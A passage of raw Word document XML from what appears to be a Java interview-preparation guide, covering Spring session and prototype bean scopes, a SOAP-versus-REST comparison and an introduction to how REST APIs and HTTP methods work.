            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C7EABDE"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ssion Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="54A5729A" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C054E1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lications only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="2139F81D" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A2A5CC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per HTTP session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="5B1AA9BE" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F0368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anages the bean for the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="47AC36DC" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28EEB65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only during the user session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w14:paraId="5688F326" w14:textId="77777777" w:rsidTr="00D9644F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34C181BF"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oring user-specific data like preferences, carts, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EE4CA53"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96" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A32C3F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totype Scope – Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4659A4A9"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80EC294"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694BAA23"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0305"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3F856D"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 bean created"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EE5952"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E629E3" w14:textId="1533D6BD"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7BB4A7"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97" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2BC73"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ssion Scope – Example (Spring MVC / Web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69930C0C"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49420C50"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05DF3EBE"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ssion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76C528"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Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CC3227" w14:textId="101DF23E"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45D5D4"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98" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B21AD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fecycle Difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BCFA09"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99" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B08ED" w14:textId="0ED2E19B" w:rsidR="00D9644F" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9644F" w:rsidP="00D9644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w:t>
      </w:r>
      <w:r w:rsidR="00B06B82" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1252C0"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non-web applications, session scope won’t work and will throw an error. Stick with singleton or prototype in such cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD63BE"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100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D81641" w14:textId="5E5766EF" w:rsidR="00276440" w:rsidRPr="00CE4B95" w:rsidRDefault="00276440">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="_Toc197867662"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between SOAP and REST? Which is more efficient?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:p w14:paraId="1480F79B" w14:textId="5EC3D0F2" w:rsidR="001A6DBB" w:rsidRPr="00CE4B95"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CE4B95" w14:paraId="43FD5101" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD01682"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4950E1E4" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6819707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 protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4803BE07" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EF6C68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only XML.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4D37D13B" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="529DF91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ver HTTP, SMTP, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="73AC31E6" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7162ABF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ilt-in standards for security, transactions, ACID, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4E2751A7" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3003380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WSDL (Web Services Description Language) to define contracts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="27757DE2" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55744AC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 due to XML and extra SOAP envelope tags.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="64EDC5B9" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="616B07D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tandard error handling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10C73462"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101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="453155D7"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CE4B95" w14:paraId="3EE0F6F0" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B6E27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0BBF17A1" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="576E1DB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n architecture, not a protocol.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="22624319" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CFA3FE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JSON, XML, HTML, plain text (JSON preferred).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="189FE488" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EB4EC4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nly over HTTP/HTTPS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="1DE49413" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490EF14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no strict rules; uses HTTP verbs (GET, POST, PUT, DELETE).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="4B88CBC1" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65116EB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trict contracts (WSDL not used).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="722073E9" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59FD779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 – JSON payloads are smaller.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="43B9FF4F" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="620BB05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status codes (e.g., 200, 404, 500).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="518462D3"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102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED00C6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ich is more efficient?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7967E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ST is generally more efficient for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429496A9"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mobile apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5964A7A3"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critical apps (smaller payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057FF4AE"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 and ease of use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DA703C"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rvices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F106A0B"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AP is better for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C0DCF9"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king, Telecom, Payment Gateway integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641079B0"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103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="022408A1" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDD1B7C" w14:textId="77777777" w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00395F6D" w:rsidP="00395F6D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67195104" w14:textId="3B6BC122"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CE4B95" w14:paraId="273607CC" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5145FEDD"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AP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="5E5E512F" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ED5D77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395F6D" w:rsidRPr="00CE4B95" w14:paraId="677AB8A2" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="635D59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lex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="61BFF438" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A0A182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Built-in (WS-Security)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="77B7E6A0" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C08E52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Only XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00395F6D" w:rsidRPr="00CE4B95" w14:paraId="2BB0AB14" w14:textId="77777777" w:rsidTr="00395F6D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651786D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ow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="339FE41A"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104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A62E0E" w14:textId="2DD30C05" w:rsidR="001A6DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="001A6DBB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="_Toc197867663"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How REST API works?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w14:paraId="508415DE" w14:textId="2260BBA1" w:rsidR="00EB6553" w:rsidRPr="000A482E" w:rsidRDefault="00EB6553" w:rsidP="000A482E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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A </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST API (Representational State Transfer API)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B055F0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Client-Server Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581AC8BC"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RESTful services follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>client-server</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model where the client sends requests and the server responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1693BB8D"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client initiates requests, and the server processes these requests, performs the necessary operations (e.g., accessing a database), and sends a response back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8ECF3D"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tateless</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB127C8"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ach request from the client to the server must contain all the information necessary to understand and process the request (e.g., authentication credentials, query parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20500E95"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does not store any information about previous requests. Each request is independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C255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niform Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640A7AA"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ful APIs follow a uniform interface, meaning the same standard methods are used to interact with the resources, irrespective of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CD550"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ource-Based</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F402C83"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REST, </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the objects or data that you interact with, and each resource is identified by a </w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>URI (Uniform Resource Identifier)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF87E40"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ources are accessed via HTTP methods (GET, POST, PUT, DELETE, etc.) to perform operations on the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57101D03"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Key HTTP Methods Used in REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2035EC09"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GET</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACD6F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trieves data from the server (i.e., fetch a resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0407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GET /users to retrieve a list of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E76C510"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OST</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D72E5D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reates a new resource on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8E3B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OST /users to create a new user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075BA0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UT</w:t>
      </w:r>
      <w:r w:rsidRPr="000A482E">
        <w:rPr>
